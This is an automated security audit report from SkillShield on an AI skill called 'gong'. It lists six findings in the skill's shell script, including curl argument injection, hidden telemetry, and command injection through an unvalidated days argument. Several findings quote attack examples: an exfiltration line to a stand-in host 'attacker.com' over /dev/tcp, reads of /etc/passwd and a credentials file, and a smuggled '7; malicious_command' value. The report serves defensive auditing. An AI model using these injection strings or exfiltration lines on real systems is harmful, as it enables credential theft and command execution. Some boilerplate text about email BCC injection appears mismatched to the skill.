Trust Assessment
gong received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 6 findings: 1 critical, 4 high, 1 medium, and 0 low severity. Key findings include Hidden network beacons / undisclosed telemetry, Arbitrary curl argument injection in 'api' function, Potential data exfiltration via arbitrary curl arguments.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 33/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings6
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Arbitrary curl argument injection in 'api' function The 'api' shell function directly interpolates all arguments from '${@:2}' into the 'curl' command without any sanitization. This allows an attacker to inject arbitrary 'curl' options, including those that can read/write local files (e.g., '--data-binary @/etc/passwd'), exfiltrate data (e.g., '--output /dev/tcp/attacker.com/port'), or potentially execute commands. Given that the script handles sensitive API credentials, this is a severe vulnerability that could lead to credential exfiltration and arbitrary command execution. Arguments passed to 'curl' should be strictly controlled and explicitly whitelisted. Instead of '${@:2}', construct the 'curl' command using an array to prevent word splitting and globbing issues, or explicitly list allowed options. For dynamic data, ensure it is properly escaped for the shell or passed via standard input. | LLM | scripts/gong.sh:19 | |
| HIGH | Hidden network beacons / undisclosed telemetry Command output piped through base64 encoding Remove undisclosed network calls and telemetry. All outbound communication should be documented and necessary for the skill's stated purpose. BCC injection in email tools is almost always malicious. | Manifest | skills/jdrhyne/gong/SKILL.md:24 | |
| HIGH | Hidden network beacons / undisclosed telemetry Command output piped through base64 encoding Remove undisclosed network calls and telemetry. All outbound communication should be documented and necessary for the skill's stated purpose. BCC injection in email tools is almost always malicious. | Manifest | skills/jdrhyne/gong/scripts/gong.sh:16 | |
| HIGH | Potential data exfiltration via arbitrary curl arguments As a direct consequence of the arbitrary 'curl' argument injection vulnerability (SS-LLM-003, line 19), an attacker can leverage 'curl's capabilities to exfiltrate sensitive data. This includes local files (e.g., '/etc/passwd', '~/.config/gong/credentials.json') using options like '--data-binary @/path/to/file' or '--output /dev/tcp/attacker.com/port'. The script itself reads and uses API credentials, making them a prime target for exfiltration. Implement strict sanitization and validation for all user-provided arguments passed to the 'api' function and subsequently to 'curl'. Only allow a predefined set of safe options and ensure that file paths or sensitive data cannot be injected. | LLM | scripts/gong.sh:19 | |
| HIGH | Unsanitized user input in 'date' command for date range calculations The '$DAYS' variable, which is derived from user input (the first argument to 'calls' or 'stats' commands), is directly interpolated into the 'date' command without any validation or sanitization. An attacker can inject shell metacharacters (e.g., '7; malicious_command') into '$DAYS', leading to arbitrary command execution on the host system. Validate and sanitize '$DAYS' to ensure it is a positive integer before using it in the 'date' command. For example, use a regular expression check like `[[ "$DAYS" =~ ^[0-9]+$ ]] || { echo "Error: Invalid days"; exit 1; }` or convert it to an integer using `printf -v DAYS_INT %d "$DAYS"`. | LLM | scripts/gong.sh:30 | |
| MEDIUM | Unsanitized 'call_id' in JSON payload leading to JSON injection The 'call_id' (the first argument to 'call' or 'transcript' commands) is directly embedded into the JSON payload string without proper JSON escaping. If the 'call_id' contains characters like double quotes ('"') or backslashes ('\'), it can break the JSON structure, leading to malformed API requests. In some scenarios, this could be exploited for JSON injection to alter the API call's intent or parameters, potentially leading to unauthorized data access or manipulation. Use a JSON-aware tool like 'jq' to construct the JSON payload, ensuring that all user-provided values are properly escaped. For example, instead of direct string interpolation, use `jq -n --arg call_id "$1" '{"filter":{"callIds":[$call_id]},"contentSelector":{"exposedFields":{"content":true,"parties":true}}}'`. | LLM | scripts/gong.sh:39 |
Scan History
Embed Code
[](https://skillshield.io/report/56d54a63cb5ad21e)
Powered by SkillShield